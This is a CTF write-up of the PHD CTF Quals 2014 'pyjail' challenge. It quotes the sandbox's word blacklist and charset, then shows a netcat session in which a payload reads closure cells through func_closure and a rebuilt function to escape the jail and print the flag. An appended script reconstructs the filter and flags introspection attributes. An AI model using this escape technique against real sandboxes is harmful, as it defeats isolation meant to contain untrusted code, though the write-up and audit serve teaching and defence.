PHD CTF Quals 2014 - pyjail
The task gives us a Python sandbox to escape. We aren't allowed to use any of the builtin functions, and the following words are banned:
(?:__|import|globals|locals|exec|eval|join|format|replace|translate|try|except|with|content|frame|back)
We are also limited to this charset:
\n\r0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ(),.:;<=>[]_{}
Inside the sandbox() function there are two functions, we_must_be_sure_flag_part1_is_ready and we_must_be_sure_flag_part2_is_ready, each of which copies its part of the flag into the FLAG variable. The flag is printed only if FLAG != part1_of_flag. In the divider function we find that, to get the complete flag, we need int(v1) / int(v2) == 13.37 (hard, huh?). To exploit this we used the divider function, which is passed into our context during the eval of our input, and called we_must_be_sure_flag_part1_is_ready() and we_must_be_sure_flag_part2_is_ready() through its data model attribute "func_closure" and the cells it holds.
Exploit code:
root@kaiman:/home/nms/phd$ nc 195.133.87.177 1337
leetleetleetleet
Welcome to pyjail!
Try to get the flag!
Use ctrl+D or --- to submit your code
def get_cell_value(cell):
    return type(lambda: 0)(
        (lambda x: lambda: x)(0).func_code, {}, None, None, (cell,)
    )()
print get_cell_value(div.func_closure[8])()
print get_cell_value(div.func_closure[9])()
---
None
None
Flag is 7hE_0w15_4R3_n07_wh47_7h3Y_533m--7hEr3_15_4_m4n_1n_a_5m111n9_649
root@kaiman:/home/nms/phd$
Razor4x
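An audit of the filter described above, as an added example that is not part of the original write-up or the challenge source: it rebuilds the two checks from the quoted regex and charset, shows that the submitted payload passes them while a direct cell_contents read is rejected by the banned word "content", and lists the function-introspection accesses a reviewer would flag. Assumptions: the space character is allowed (the payload contains spaces), and INTROSPECTION plus the function names are hypothetical.

```python
import io
import re
import tokenize

# Word blacklist exactly as quoted in the write-up.
BANNED = re.compile(r"(?:__|import|globals|locals|exec|eval|join|format|replace|"
                    r"translate|try|except|with|content|frame|back)")
# Charset as quoted in the write-up; the leading space is an assumption.
ALLOWED = set(" \n\r0123456789abcdefghijklmnopqrstuvwxyz"
              "ABCDEFGHIJKLMNOPQRSTUVWXYZ(),.:;<=>[]_{}")
# Hypothetical audit list: Python 2 function attributes exposing code and closures.
INTROSPECTION = {"func_closure", "func_code", "func_globals", "func_defaults"}

# Payload from the write-up's session (Python 2 syntax), indentation restored.
PAYLOAD = """def get_cell_value(cell):
    return type(lambda: 0)(
        (lambda x: lambda: x)(0).func_code, {}, None, None, (cell,)
    )()
print get_cell_value(div.func_closure[8])()
print get_cell_value(div.func_closure[9])()
"""

def passes_jail_filter(src):
    """Reconstruction of the two checks the write-up describes."""
    return set(src) <= ALLOWED and BANNED.search(src) is None

def introspection_hits(src):
    """Return (line, name) for every '.name' access listed in INTROSPECTION.

    Works on tokens rather than the AST, so Python 2 source can be scanned
    from Python 3 without a syntax error on the print statement.
    """
    hits, prev = [], None
    for tok in tokenize.generate_tokens(io.StringIO(src).readline):
        if tok.type == tokenize.NAME and prev == "." and tok.string in INTROSPECTION:
            hits.append((tok.start[0], tok.string))
        prev = tok.string
    return hits

if __name__ == "__main__":
    print("payload passes filter:", passes_jail_filter(PAYLOAD))
    print("direct cell read passes:",
          passes_jail_filter("div.func_closure[8].cell_contents"))
    for line, name in introspection_hits(PAYLOAD):
        print("line %d: .%s" % (line, name))
```

The word list stops the attribute name cell_contents but not the equivalent construction from a code object and a closure tuple, so keeping closure-bearing functions such as div out of the evaluated context matters more than extending the list.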